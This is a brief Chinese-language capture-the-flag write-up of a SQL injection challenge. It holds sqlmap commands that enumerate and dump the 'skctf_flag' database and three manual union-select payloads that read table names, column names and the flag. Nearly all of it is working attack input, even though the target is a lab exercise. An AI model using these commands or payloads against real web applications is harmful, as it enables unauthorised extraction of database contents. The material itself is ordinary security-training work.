打开地址,输入1正常显示,输入1’报错,输入1#显示,说明此处存在SQL注入,抓包后用sqlmap进行爆破
python2 sqlmap.py -r a.txt --dbs
python2 sqlmap.py -r a.txt -D skctf_flag --tables
python2 sqlmap.py -r a.txt -D skctf_flag -T fl4g --columns
python2 sqlmap.py -r a.txt -D skctf_flag -T fl4g -C skctf_flag --dump
也可以通过在浏览器地址进行联合查询注入:
id=0' union select 1,user(),version(),(select group_concat(table_name) from information_schema.tables where table_schema=database())#
id=0' union select 1,user(),version(),(select group_concat(column_name) from information_schema.columns where table_schema=database()and table_name='fl4g')#
id=0' union select 1,user(),version(),(select skctf_flag from fl4g)#